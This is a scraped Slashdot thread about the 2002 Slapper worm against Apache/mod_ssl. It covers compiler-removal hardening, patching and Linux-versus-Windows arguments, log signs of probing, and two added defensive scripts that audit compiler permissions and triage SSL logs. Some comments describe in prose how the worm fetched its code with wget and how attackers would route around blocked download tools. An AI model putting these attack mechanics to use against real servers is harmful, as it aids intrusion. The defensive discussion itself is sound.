It's not stupid at all. You are correct in stating that the compiler is not the security flaw. However, if the compiler were not there, this is the 4th worm in the past few months that you wouldn't have been vulnerable to. Simply because they *could* find other means of implementing the worm doesn't mean that you should make this one easy. There are 2 goals here:
Prevent compromise. This is done by disabling unnecessary services and keeping your patch levels current, among other things.
Reduce the impact of compromises that do occur. One way to do this is, much as you disable unnecessary services, only keep the software needed for your application on the box.
As "stupid" as it may seem from an ivory tower perspective, in practice it helps. It's not a first line of defense, but it helps.
-- .sig: file not found
Re:Same mantra applies to Linux and MS sysadmins:
by
HiThere
·
· Score: 2
A nicer answer is to move the compiler to another folder and make it unfindable from the system path, and then add it to the path of selected users. I suppose you could also read protect it, but if the virus has root, that wouldn't help, and if it doesn't, then the damage it could do is minimal. (Perhaps the script to add gcc to the path should need to be manually executed? Perhaps it should not be added, but need to be specified? /usr/bin/gcc/gcc...?) Any particular solution is possible for the virus to work around, but diverse solutions would really limit the possibilities for that. (Well, not installing gcc at all is difficult to work around, but it would also make installing software a bit difficult.)
--
I think we've pushed this "anyone can grow up to be president" thing too far.
Re:Same mantra applies to Linux and MS sysadmins:
by
mjh
·
· Score: 2
Yeah I've set up a RH box doing this, too. It's nice, but it's not the same. I think the problem is that there simply aren't enough people contributing to the RPM repositories. Basically it's just Red Hat. Which is pretty good, but it's not the same as debian.
Because RH has to maintain so many packages, more or less, all by themselves, the workload on each package maintainer is pretty high. And they're not able to keep up with patches as well as debian. Security patches are kept about equally. But other non-security related patches don't seem to get into the red hat repositories as quickly as they get into debian.
But that's just my $.02 after having tried apt-rpm for a month or so. That may not have been long enough to get a very good feel for it.
-- Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
Re:Same mantra applies to Linux and MS sysadmins:
by
Anonymous Coward
·
· Score: 0
For the record: I run a personal webserver with nothing on it except a bare minimum of tools. Anything else that I thought I might want, I burned onto a CD. Now, if I do want access to wget, ftp, gcc, etc. I can pop in the CD, mount it, and away I go!
Re:Same mantra applies to Linux and MS sysadmins:
by
Anonymous Coward
·
· Score: 0
# add authorized users to the wheel group in /etc/group
chown root:wheel /usr/bin/gcc
chmod 750 /usr/bin/gcc
Now apache can't compile anything. Problem solved.
Re:Same mantra applies to Linux and MS sysadmins:
by
texaport
·
· Score: 1
Same mantra -- Patch and reboot?
Time to go back to measuring uptime in hours instead of days...
Re:Same mantra applies to Linux and MS sysadmins:
by
fatboy
·
· Score: 1
Same mantra -- Patch and reboot?
Time to go back to measuring uptime in hours instead of days...
Nope. I have patched one of my Linux servers several times; its uptime? 529 days. It rolled over to 0 days uptime at 497 days. Rebooting is for kernel and hardware upgrades. :)
-- --fatboy
Re:Same mantra applies to Linux and MS sysadmins:
by
Anonymous Coward
·
· Score: 0
you can use perl (or even bash) to overrun a stack and insert the assembler exploit code that calls a shell script. If gcc wasn't there, they'd use something else.
Re:Same mantra applies to Linux and MS sysadmins:
by
Anonymous Coward
·
· Score: 0
Everything that helps, obviously, helps.
I set the permissions on gcc to only work for root. Not perfect, as users can scp their own files, and could set up their own compiler. So could a worm if it was that smart. But it is one hurdle amongst other hurdles. If someone or thing wants to '0wN' my box, they're going to have to work for it. Given that there are plenty o' easier targets out there, I'm relatively safe from the casual cracker or simply opportunistic worm (patch, patch, patch!).
It's almost a head game. I put on the cracker hat and think of stuff, sysadmin hat to come up with countermeasure, etc. Cultivate an evil self and fight it rather than waiting for some genuine bad guy to challenge you.
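The chown/chmod recipe posted above, HiThere's suggestion of moving the compiler out of the system path, and this poster's "gcc only works for root" all come down to the same check: can the unprivileged account the web server runs as execute the toolchain? Here is an added example (not code from any poster) in POSIX sh that answers that for a list of candidate binaries and applies the group-restricted 750 mode to a file. The candidate names and the /usr/bin location are assumptions; `stat` is called in its GNU form with the BSD form as fallback.

```sh
#!/bin/sh
# Added example: find toolchain binaries that are executable by "other"
# (i.e. by an unprivileged service account such as the one a web server
# runs as) and apply the thread's owner/group/mode recipe to a file.

# mode_of FILE : print the octal permission bits (GNU stat, then BSD stat).
mode_of() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%OLp' "$1"
}

# other_can_execute FILE : succeed if the "other" class has execute permission.
other_can_execute() {
    mode=$(mode_of "$1") || return 2
    last=${mode#"${mode%?}"}        # final octal digit = permissions for "other"
    case "$last" in
        1|3|5|7) return 0 ;;
        *)       return 1 ;;
    esac
}

# world_executable_in DIR NAME... : print each NAME under DIR that exists and
# is executable by other. Names that are not installed are skipped silently.
world_executable_in() {
    dir="$1"; shift
    for name in "$@"; do
        path="$dir/$name"
        [ -e "$path" ] || continue
        if other_can_execute "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# restrict_to_group FILE GROUP : the recipe from the thread: group GROUP and
# mode 750, so only root and members of GROUP can run it. The chown to root
# is attempted but not required to succeed, so the function also works on a
# scratch file owned by an ordinary user.
restrict_to_group() {
    chown root "$1" 2>/dev/null || true
    chgrp "$2" "$1" && chmod 750 "$1"
}

# Stand-alone use: audit the usual toolchain locations (candidate list is an
# assumption; add whatever your own build needs).
world_executable_in /usr/bin gcc cc g++ as ld make
```

Run the audit again after every package update: a reinstalled compiler package normally comes back with its default mode, which silently undoes the restriction.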
Re:Same mantra applies to Linux and MS sysadmins:
by
slamb
·
· Score: 2
As "stupid" as it may seem from an ivory tower perspective, in practice it helps. It's not a first line of defense, but it helps.
I'd have to say that removing arbitrary bits of your toolchain because some worm uses them is an ivory tower idea. It makes assumptions of a perfect system (you have a staging machine that has identical library versions, etc). When those are not true, it doesn't work out well - the version you've meticulously tested elsewhere fails in a way it wouldn't if you had compiled it locally. And the time spent doing it could be better spent running rhn_register or similar for much more real gain.
To give further examples, I expect people to say several of the following in the future:
don't have a compiler on your production machine (again. worm workaround: download compiled code)
don't have wget on your production machine. (worm workaround: use curl, links, lynx, ftp, ncftp, scp, sftp, or just implement the transfer itself; it doesn't require much code.)
add a fake /etc/hosts entry for evil.site (work by IP address, change the site name)
deny outbound connections from the webserver (this one actually would stop your machine from infecting other servers unless the attacker gets privileges necessary to change the firewall rules, but it would be really annoying)
remove /bin/uname (use /usr/bin/file to find the binary type of a standard system binary)
remove /usr/bin/file (some other trick to find system type; there are plenty)
run the webserver in a jail on a machine that is uncrippled. (Now this one actually makes sense, though it may not realistically be worth the effort.)
At some point, you've made things much more difficult for yourself and lost all perspective on a non-problem. These worms have all happened well after the patches are available.
Re:Same mantra applies to Linux and MS sysadmins:
by
WoodstockJeff
·
· Score: 1
However, if the compiler were not there, this is the 4th worm in the past few months that you wouldn't have been vulnerable to.
Unfortunately, to keep a system properly up-to-date, it is often necessary to compile packages from source... ON the target machine, in order to get all the pieces in place, because the Makefiles provided ass-u-me a local development environment.
Our main web server got hit this month. The compiler environment was installed because one of the packages we use needed updating. There was no current RPM for it, and several of the features we needed weren't compiled into the RPM versions that are available.
The Makefile provided refused to work when I copied the source/executable tree from our development machine to the production box, because it required tools in the gcc package. To install those particular tools meant installing enough of gcc to let the worm do its damage...
Who do we hand the "Stupid" sign to in this case? Once you install things with RPM, it is sometimes a PITA to get them uninstalled, because of suddenly-discovered dependencies...
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
Seems to me like older anti-MS comments are coming around and biting people in the ass.
Re:The Worm
by
Anonymous Coward
·
· Score: 1, Funny
I find it terribly amusing that you find this terribly amusing. Why so much interest? Did your solitaire game blue screen?
You ask why so much interest. Could you perhaps be more specific? Why so much interest in open-source, or worms, or the ever-prevalent hypocritical comments that are made by a few ignorant people claiming to be on the side of open-source?
In response to your second question (did my solitaire game blue-screen): No, it didn't. It hasn't since I upgraded from 98 to 2000 and later from 2000 to XP.
As for being fixed long ago... MS releases patches as well, and many times the worms propagate because of many sysadmins who don't apply said patches -- this is a similar case.
Yes, two or three minor worms in an optional component of an open source server are certainly as big a deal as the literally thousands of virii/security holes/etc in the fundamental core of Windows. The several thousand servers that have been infected with Slapper.b/c certainly compare in scope to the hundreds of thousands, if not millions, affected by Code Red/Nimda/I Love You/etc.
Re:The Worm
by
chrysrobyn
·
· Score: 5, Insightful
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
I am the administrator for two Linux servers, a Slackware 7.0 box and a Debian Woody box. I'm scared that I'll get rooted again, but do you know what I'm thinking anyway? "Bring it on." Let these worms propagate, let some publicity get out, and let the patches come. They will come, just as they always have. I'll be a wget %1;upgradepkg %1 or apt-get update;apt-get upgrade away from being back up to speed.
The open-source community, contrary to your assertion, has for years said two things 1) Lazy admins risk getting hacked and 2) Open source patches flow more freely than closed source ones. I don't think the number of holes against NT 4.0 (for example) is criticised, but rather the length of time between exploit and patch-- the criticism is of the number of documented, unpatched holes. If you show me a list of documented, unpatched holes, I'll show you a mailing list / IRC channel / news group that just found a list of things to do for the afternoon. Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows and resort to childish retorts and pleas for silence.
Bring it on, hackers, help us audit the code. Win prestige for you, win a better OS for us.
Re:The Worm
by
Anonymous Coward
·
· Score: 1, Insightful
What I find amusing is that this is called a "Linux Worm" when in reality, it's an Apache+SSL problem, NOT a problem with Linux itself.
You cannot compare this to Windows holes, which are usually actual flaws with Windows (since Microsoft is so hell-bent on "integrating" everything with the operating system).
'Do you know how much you're hurting the open-source movement? Please stop.'
I don't think I've *ever* heard anyone say that - certainly not at the local LUG meetings or amongst other fellow users in the area. Maybe it's a Michigan thing, but I can not ever recall hearing or reading comments like that.
What I find terribly amusing is your lack of knowledge. Patch is more than one month old.
This virus is not hurting the Linux community. It just shows that there are too few holes for virus writers to be original. The last 3 viruses were using the same one hole. That's more promoting than demoting.
Well, for bad admins. I feel it's ok if they get infected. And for users, they don't have a web server, but if they have, they should click the Update icon sometimes.
-- Signature Pro version 1.13.2-3 release 83.5 beta3try7 after-breakfast edition
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
Seems to me like older anti-MS comments are coming around and biting people in the ass.
Hardly. The inability to properly admin a system is biting them in the ass. The comments to Microsoft sucking when it comes to security still apply. When someone says that Linux is more secure than Windows, that is not saying it is perfect. Nobody in their right mind would say that any OS is totally secure. The difference is, it is a Linux community. People who find exploits should alert the community before releasing the information in the wild. The same applies to Windows, Microsoft should be alerted to the problem well before everyone else is. The difference is, the Open Source community will quickly patch it, Microsoft will do whatever they want to do.
There is nothing wrong with yelling at people about keeping their systems up to date. It is just bad practice to not keep up with patches. With Open Source, you can do that - with Windows, you can only do that if Microsoft provides you with patches. The OSS community has absolutely no say in how MS decides to handle vulnerabilities, but we do have a voice in our own community.
And if you think a worm or two means that now Linux is catching up to MS in the number of vulnerabilities, you are living in a dream world. Plagued? Please. At least the OSS community isn't delusional and says "there are no bugs".
--
My beliefs do not require that you agree with them.
We'll see how much of a plague it is a year from now. I'm still getting attacked by Nimda and Sircam several hundred times a day. I've seen almost no Slapper attacks. If I'm seeing several hundred Slapper attacks this time next year, then I'll call it a plague.
-- To Do:
1. Take over world
2. Pick up Milk and Bread on the way home
The problem I have with Windows is it doesn't give me the same level of flexibility as Unix systems. If a bug is found, I can patch the system remotely or ssh into the box and shut stuff down. On Windows my options are limited. Even things like file ownership and permissions are hobbled in XP. In Win XP Pro, you have to boot to safe mode to change drive/file security properties. Say there's a patch for Windows and I want to patch it remotely because I'm away from home for a week. How the heck am I supposed to patch a Windows system?
With Unix, I can ssh in, d/l the patch, apply, restart the service (not the machine) and log out. It's good that security in XP Home Edition doesn't give normal users the ability to change ownership and file permissions, but for XP Pro why in the world can't I access those features without rebooting to safe mode without a network connection? I suppose one could reboot to safe mode with networking enabled, but I haven't figured out how to do that remotely. There should be the equivalent of sudo in Windows for remote administration. These are my opinions, right or wrong. But there are functional differences in security.
Re:The Worm
by
Anonymous Coward
·
· Score: 0
Bring it on, hackers, help us audit the code. Win prestige for you, win a better OS for us.
Yus! Please begin your OpenBSD bashing at this time.
The open-source community, contrary to your assertion, has for years said two things 1) Lazy admins risk getting hacked and 2) Open source patches flow more freely than closed source ones.
The Slashdot community, on the other hand, has for years appended a third comment: we're superior, we're Linux buffs, we're the best, and we apply patches.
Maybe the Slashdot community does. But let's face it -- in the face of this smug and elitist attitude comes the fact that thousands of Linux servers are being compromised because their administrators don't apply patches in a timely fashion. Remember, too, that when the Nimda et. al. worms hit, the Slashdot discussions included many regular readers who are also Windows administrators calmly pointing out that they had had no difficulties as they were patched long ago. Interesting, too, to note the (huge generalisation) often calm and mature reaction versus the yelling and screaming and chest-beating reaction of the "see-we-really-are-better-than-you-nyah-nyah-nyah" crowd (/huge generalisation).
If you show me a list of documented, unpatched holes, I'll show you a mailing list / IRC channel / news group that just found a list of things to do for the afternoon.
Very valid point. So let me ask you (plural you here) -- when was the last time you spent an afternoon coding, testing, reviewing, and QCing a patch? Maybe you're one of the admirable group who actually does code patches in your spare time. But, more likely, I suspect, is that the vast majority of the readers of this message never have and never will submit a patch.
Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows
I'm sorry, but I couldn't let this one go. The original poster didn't make such a statement. Not even such an inference. The post, instead, merely pointed out the hypocrisy demonstrated by the attitudes described.
Also, come the 2.6 kernel, and pluggable security modules, installing stack protectors and tiered security models will be more commonplace and a lot of the stupid holes that have allowed these attacks will simply go away.
One thing that would fix a whole lot of problems is for a security model to be installed that allowed root to delegate low-port and raw-protocol access to non-root accounts.
Granted these particular worms would not have cared, but there have been many remote root exploits that happened only because a daemon needed to be root to create a low port or perform raw protocol manipulation.
Open any folder window. Tools menu, folder options, view tab, the last option in the advanced box ("Simple file sharing") - uncheck that. You'll get your real sharing and permissions tabs back.
Whoops, guess I spoke too soon. CERT revised their warning.
>> Note: Based on initial reports received by the CERT/CC, earlier versions of this Advisory mentioned other SSL error messages that might be logged on potentially vulnerable hosts. On further analysis, we have concluded that these log messages were unrelated to the Apache/mod_ssl worm.
It doesn't seem to show up in the logs as anything out of the ordinary.
-- To Do:
1. Take over world
2. Pick up Milk and Bread on the way home
What's even worse is Windrones who've had their feelings hurt so many times by Linux geeks getting all puffed up because *one* virus comes along every blue moon targeted at Linux boxen. This is hardly a "plague", unlike the seemingly constant attacks against *other* platforms.
My statement:Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows
Kiwimate:I'm sorry, but I couldn't let this one go. The original poster didn't make such a statement. Not even such an inference. The post, instead, merely pointed out the hypocrisy demonstrated by the attitudes described.
And it was correct.
If I have misinterpreted CTRamsden's original intent of the statement that, [when faced with vulnerabilities, the open-source community responded with] "Windows still sux..." [paraphrasing, hopefully not too liberally], please forgive me, and I will ask for kiwimate to accept my thanks for pointing out a misinterpretation.
I have seen too many people equate the vocal non-coding, quick to criticise Microsoft Slashdot subgroup as characteristic of the entire open source movement. I think it's very important to remember and recognize that those people are out there -- but equally important to understand that others are out there who accept criticism as constructive.
The Slashdot community, on the other hand, has for years appended a third comment: we're superior, we're Linux buffs, we're the best, and we apply patches.
Just because those are the posts you see doesn't mean everyone thinks this. I, for one, admit to not always being as vigilant as I would like to be. There are many things to attend to, so you can't be on top of everything, but we all know that you only have yourself to blame if you miss something important. The dynamics of the community help a lot, so it isn't as big of a problem. The second point helps a lot, and the way MS hides their bugs just makes it harder even if you do everything you can.
> If you show me a list of documented, unpatched holes, I'll show you a mailing list / IRC channel / news group that just found a list of things to do for the afternoon.
Very valid point. So let me ask you (plural you here) -- when was the last time you spent an afternoon coding, testing, reviewing, and QCing a patch? Maybe you're one of the admirable group who actually does code patches in your spare time. But, more likely, I suspect, is that the vast majority of the readers of this message never have and never will submit a patch.
There are many roles in the community, not everyone has to spend all their time chasing bugs to contribute. In fact, it would be a duplication of efforts, and not really useful. Using the code is an important role too, and your responsibility there is to give feedback without annoying the developers while they work. Also, keep in mind that many are scratching their own itch on another project, so they leave this to the domain experts.
> Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows
I'm sorry, but I couldn't let this one go. The original poster didn't make such a statement. Not even such an inference. The post, instead, merely pointed out the hypocrisy demonstrated by the attitudes described.
You missed his point here completely. The original poster did say "Linux is as bad as Windows", which is patently false. He was just saying that not everyone can refute this statement with a cogent argument. Many can, and he did above.
Why would anyone bother arguing against Windows when it's so simple to argue FOR Linux...
On the 11 servers I run I'm averaging 141 days of uptime with a high of 258 days and a low of 25 days. What more needs to be said?
Re:The Worm
by
Anonymous Coward
·
· Score: 0
Yes. Win XP. Automatic updates.
Even Automatic random reboots for your bastards who don't reboot after applying those patches.
One thing that would fix a whole lot of problems is for a security model to be installed that allowed root to delegate low-port and raw-protocol access to non-root accounts.
Yeah! I've been waiting for that one for years! Connecting to the internet just *shouldn't* require access to root!
--
I think we've pushed this "anyone can grow up to be president" thing too far.
That worked. Thanks for the tip. Man, you don't know how much time I wasted trying to figure out how to get the Win2K folder security options back. I even tried help, which didn't help at all. Why in the world I had to waste over 20 hours looking for a way to do a simple thing really isn't an improvement over Win2K in my mind. In Unix, all I have to do is "man ls". Now if Windows help was more helpful and gave me that info the first time I searched for security options, it would be a real improvement.
The windows worms (nimda et al) got ADMINISTRATIVE privileges IMMEDIATELY upon launching the attack. This says something about security I think.
Re:The Worm
by
Anonymous Coward
·
· Score: 0
"Flamebait"?!? What justifies this?
Moderators on crack, AGAIN.
Re:The Worm
by
Anonymous Coward
·
· Score: 0
I find it terribly amusing how wildly inaccurate pro-MS posts such as yours always get moderated so highly. Since you undoubtedly logged in with IE on Win, click that little 'windows update' icon under the start button and count how many security patches for your OS were released in the last two months. No real comparison with linux, is there?
Re:The Worm
by
Anonymous Coward
·
· Score: 0
upgrading from 2000 to XP is like saying "I upgraded from default to jungle icons (and installed after dark screen savers.)
Re:The Worm
by
Anonymous Coward
·
· Score: 0
Once again Windows users confuse the number of security exploits with the severity of the exploit. A windows security problem has multiple paths of entry and multiple paths of infection as it spreads throughout the whole Microsoft Forest. This slapper worm ONLY affects linux systems running Apache and openSSL. As opposed to any Worm for Windows(you choose the flavor) this worm does not spread throughout the network like a case of smallpox passing through an uninoculated population.
Re:The Worm
by
Anonymous Coward
·
· Score: 0
The replacement for sudo is runas - to, for example, start a shell under an Admin account, do "runas /user:domain\account cmd.exe". Type runas /? at a command prompt for the full skinny.
As for remotely accessing your boxen, you can either telnet to them (unlike many telnets, W2K and WXP use challenge/response authentication, so you're not passing plaintext passwords over the wire) or connect using Terminal Services (called Remote Desktop in WinXP). Or, if you want to SSH into them, use one of the many SSH-on-NT implementations - I like PuTTY
So yes, your opinions are wrong. Dare I say it... RTFM:-)
A missed chance for some bad humor
by
shren
·
· Score: 2, Redundant
According to researchers at F-Secure, the Slapper.B worm variant is able to retrieve its source code from a Web page after the worm has been removed from infected servers. The worm uses a common free software utility, wget, to retrieve its source code from an infected Web page in the home.ro domain.
Administrators of the domain, which is located in Romania, have been notified and the infected page has been deleted from the site, according to F-Secure.
They should have replaced the code for the worm with code that pops up a window that says "Patch your server, you halfwit!"
-- Maybe the state's highest function is to grind out insoluble problems. (Zelazny, Hall of Mirrors)
Re:A missed chance for some bad humor
by
Anonymous Coward
·
· Score: 0
well, at least the writer of the worm keeps his Source OPEN !!
is that what OSS is all about!
The most important thing to point out is ...
by
matjac
·
· Score: 1
"Of course, by the time you read this, the bug will have been patched.;)"
This is the most significant benefit (to me at least). In fact, I think that to most people, the biggest benefit of open source is the rapid deployment of bug fixes, patches etc. rather than cheap or free software. Without open source, I'm afraid most of us would be stuck in a world of buggy software that only works when it feels like it.
Oh Wait a minute... What? "Windows has encountered a problem..."
Anyway, the point is that I have never heard of MS, Oracle, or any of the other major software companies ever having a patch within hours much less days for anything.
Re:The most important thing to point out is ...
by
stinky+wizzleteats
·
· Score: 2
Having a patch in a few hours isn't all that impressive - it's nice, but in effect - it's not that useful.
I suppose it's more useful to be subject to the delays of what the commercial sfw industry calls "accepted vulnerability reporting practices" - which means we'll let you and your systems remain vulnerable for months while we:
Do a cost benefit analysis to derive the date at which it is more expensive to us to allow the problem to remain unpatched than to fix it.
Forward the results of the above analysis a schedule for the patch devel group so they can work on a patch.
Coordinate with other devel groups, legal, and marketing to determine what competitive inhibition (breaking Netscape, Novell, Samba, etc.), new DRM measures, EULA changes, and other related stuff should be released with the patch.
people are wary of installing untested patches
I have all of my Linux systems on automatic update, and I've never once had a problem with a patch. I've also never had to accept a new EULA, never had icons I'd previously deleted return to my desktop, nor had third party software suddenly fail to work following a system update.
CERT Advisory
by
Anonymous Coward
·
· Score: 5, Informative
A spacious analogy.
by
Lethyos
·
· Score: 2, Insightful
A bank robbery is a different type of intrusion. You cannot threaten a computer to give you access. An armed bank robbery is a failure of humans, not security systems. I'm sure all the cameras and locking mechanisms on doors and vaults at a bank work just fine in an armed robbery. The humans unlock them out of self-preservation and the mechanisms do exactly what they are requested.
Exploiting a vulnerability like this is similar to walking down the alley behind the bank and finding an unlocked door that takes you straight into the vault. Some people (other politics aside such as "who would want to help such a stupid bank!?") would inform the bank, hoping to increase its security. Typically in open source, when we find unlocked doors, we tell the maintainers as soon as possible. It's peer review.
I am not suggesting we do not release exploits though. Worms like this are a good practice run (and a great way of informing the sysadmins they need updates). *shrug*
Exploiting a vulnerability like this is similar to walking down the ally behind the bank and finding an unlocked door that takes you straight into the vault.
No, exploiting a vulnerability is the same thing as an alarm system and safe lock expert breaking into the bank in the middle of the night.
"Exploiting" an open door is comparable to deleting files on anonymous FTP, even if you can do it (stupid admin), it doesn't mean that you are right if you destroy other people's data.
Surely a failure of a security system could also be regarded as a failure of the humans who designed it.
Re:A spacious analogy.
by
Anonymous Coward
·
· Score: 0
Whether the designers failed is dependent upon the purpose and limitations of the design. Most banks are not designed to withstand nuclear detonations, repeated use of precision explosives, week-long use of construction or military equipment...nor denial-of-service attacks ("They welded the vault SHUT and collapsed the building?").
But then, most bank vaults contain a little cash and the safety deposit boxes -- the bank's millions are stored in the account books of regional banking services. So few banks have to withstand attacks which cost millions of dollars because thieves with millions of dollars know it would be a waste of money.
what does it look like?
by
Anonymous Coward
·
· Score: 5, Interesting
What should I look for in my apache logs to see if I'm being "hit" by it? Anyone have an example?
See earlier post and use the latest chkrootkit. It's that easy to check.
Re:what does it look like?
by
EkiM+in+De
·
· Score: 2, Informative
Well I'm not entirely sure but I found that in my error_log a couple of bad hits from other Apache Servers. I found the Apache Test page on these servers which I suspect is a bit of a giveaway that perhaps these are not active servers. Anyway I could be completely wrong, but since these hits were from Web servers I kind of suspect that these servers have not been patched.... God I hope that the log entries below don't indicate that I've been hit and damaged
Anyway the hits looked like this:
You'll only get that file if you're vulnerable. If you're up to date on patches, you won't see anything in /tmp (other than files that should be there).
Re:what does it look like?
by
KMitchell
·
· Score: 5, Informative
You'll get some additional stuff in your access log and potentially error log but the telltale sign that (on a patched system) someone is pinging you for the exploit is something like this in your ssl_error_log:
Thought I'd check mine, nothing like that, just the usual junk...
[Tue Sep 24 11:47:26 2002] [error] [client 213.208.108.106] File does not exist: /usr/local/httpd/htdocs/c/winnt/system32/cmd.exe
[Tue Sep 24 11:47:26 2002] [error] [client 213.208.108.106] File does not exist: /usr/local/httpd/htdocs/d/winnt/system32/cmd.exe
Thanks Bill!
--
----
Den ene knappen er powerknapp, den andre er Bender voice knapp "Bite My Shiny Metal Ass"
Re:what does it look like?
by
Anonymous Coward
·
· Score: 0
what about this? my ssl_engine_log is full of this stuff...
[25/Sep/2002 09:21:36 07428] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[25/Sep/2002 09:21:36 07427] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[25/Sep/2002 09:21:36 06953] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[25/Sep/2002 09:21:36 06950] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[25/Sep/2002 09:21:36 07268] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[25/Sep/2002 09:21:36 07269] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[25/Sep/2002 09:21:37 07429] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[25/Sep/2002 09:21:37 07436] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[25/Sep/2002 09:21:37 07261] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[25/Sep/2002 09:21:55 07255] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?]
Yeah, in my logs that stuff is from the same IPs that there's then the buffer overflow attempt from. Unfortunately, those spurious handshakes also create a short-term DOS situation - they keep Apache awfully busy. Has anyone come up with a way to block the spurious attempts with, say, iptables, while keeping legitimate 443 service open?
-- "with their freedom lost all virtue lose" - Milton
Re:what does it look like?
by
Secure42
·
· Score: 1
I am also getting the same logs:
[error] OpenSSL: error:1406B458:lib(20):func(107):reason(1112)
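The log lines quoted in this thread come in two shapes: the mod_ssl ssl_engine_log format (timestamp, Apache child PID, level, message) and the Apache error_log format with a [client ...] field. The Python below is an added example, not code from the thread or from Apache/mod_ssl. It parses both formats from constructed sample lines modelled on the ones posted above and summarises what is actually worth looking at: seconds with a burst of "Spurious SSL handshake interrupt" messages, any line carrying the OpenSSL error string Secure42 quotes, and which client addresses are probing. The names (triage, ENGINE_RE, ERROR_RE, SAMPLE_LINES) and the burst threshold of five per second are my own assumptions.

```python
import re
from collections import Counter, defaultdict

# mod_ssl ssl_engine_log line, as quoted in the thread:
#   [25/Sep/2002 09:21:36 07428] [info] Spurious SSL handshake interrupt[Hint: ...]
# The bracketed number is the child PID; the line carries no client address.
ENGINE_RE = re.compile(r"^\[(\d{2}/\w{3}/\d{4} \d{2}:\d{2}:\d{2}) (\d+)\] \[(\w+)\] (.*)$")

# Apache 1.3 error_log line, as quoted in the thread:
#   [Tue Sep 24 11:47:26 2002] [error] [client 213.208.108.106] File does not exist: ...
ERROR_RE = re.compile(r"^\[([^\]]+)\] \[(\w+)\] \[client ([0-9.]+)\] (.*)$")

HANDSHAKE_INTERRUPT = "Spurious SSL handshake interrupt"
OPENSSL_ERROR = "error:1406B458"  # the OpenSSL error string quoted by Secure42


def triage(lines, burst_threshold=5):
    """Summarise SSL handshake noise and client probes from mixed Apache log lines.

    Returns a dict with:
      bursts           {timestamp: count} seconds with >= burst_threshold interrupts
      openssl_errors   [(timestamp, pid)] lines carrying the 1406B458 error string
      probes_by_client {client_ip: [messages]} from error_log lines
    """
    interrupts_per_second = Counter()
    openssl_errors = []
    probes_by_client = defaultdict(list)

    for raw in lines:
        line = raw.rstrip("\n")
        m = ENGINE_RE.match(line)
        if m:
            ts, pid, _level, msg = m.groups()
            if HANDSHAKE_INTERRUPT in msg:
                interrupts_per_second[ts] += 1
            if OPENSSL_ERROR in msg:
                openssl_errors.append((ts, pid))
            continue
        m = ERROR_RE.match(line)
        if m:
            _ts, _level, client, msg = m.groups()
            probes_by_client[client].append(msg)

    bursts = {ts: n for ts, n in interrupts_per_second.items() if n >= burst_threshold}
    return {
        "bursts": bursts,
        "openssl_errors": openssl_errors,
        "probes_by_client": dict(probes_by_client),
    }


# Constructed sample, modelled on the lines quoted in this thread (not real logs).
# The cmd.exe requests are IIS probes of the Code Red/Nimda kind, unrelated to Slapper;
# they are here only to exercise the error_log format.
_INTERRUPT = "[info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?]"
SAMPLE_LINES = (
    ["[25/Sep/2002 09:21:36 %05d] %s" % (pid, _INTERRUPT) for pid in (7428, 7427, 6953, 6950, 7268, 7269)]
    + ["[25/Sep/2002 09:21:37 %05d] %s" % (pid, _INTERRUPT) for pid in (7429, 7436)]
    + ["[25/Sep/2002 09:21:37 07261] [error] OpenSSL: error:1406B458:lib(20):func(107):reason(1112)"]
    + [
        "[Tue Sep 24 11:47:26 2002] [error] [client 213.208.108.106] File does not exist: /usr/local/httpd/htdocs/c/winnt/system32/cmd.exe",
        "[Tue Sep 24 11:47:26 2002] [error] [client 213.208.108.106] File does not exist: /usr/local/httpd/htdocs/d/winnt/system32/cmd.exe",
    ]
)

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_LINES), indent=2))
```

Two caveats when using this on real logs. The ssl_engine_log entries carry only the child PID, so tying a burst back to a source address means correlating by timestamp with the access log or ssl_request_log. And mod_ssl emits that interrupt message for any handshake the peer abandons, so a lone entry means nothing; many in the same second, followed by the OpenSSL error line, is the pattern the posters above are describing.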
Re:Where's all the yammering now?
by
Anonymous Coward
·
· Score: 0
I guess not even open source solutions can cure lazy admin syndrome, eh?
When was it stated that it would?
Re:The bite
by
Anonymous Coward
·
· Score: 0
So, did the bite hurt, ass?
It's a distro problem, not a linux problem
by
tshoppa
·
· Score: 5, Insightful
The problem is that many (most? all?) the big-name distros have Apache built with mod_ssl on them. Even though I would guess that only a tiny percent of all web servers need SSL. (Admittedly that tiny percent is very important, as no money transactions should be going on without security...)
IMHO if you need SSL on a webserver, you should be forced to go through the download + build + cert process yourself.
Re:It's a distro problem, not a linux problem
by
Hard_Code
·
· Score: 2
"IMHO if you need SSL on a webserver, you should be forced to go through the download + build + cert process yourself."
At some point you have to unless you want to run with a phony snakeoil cert.
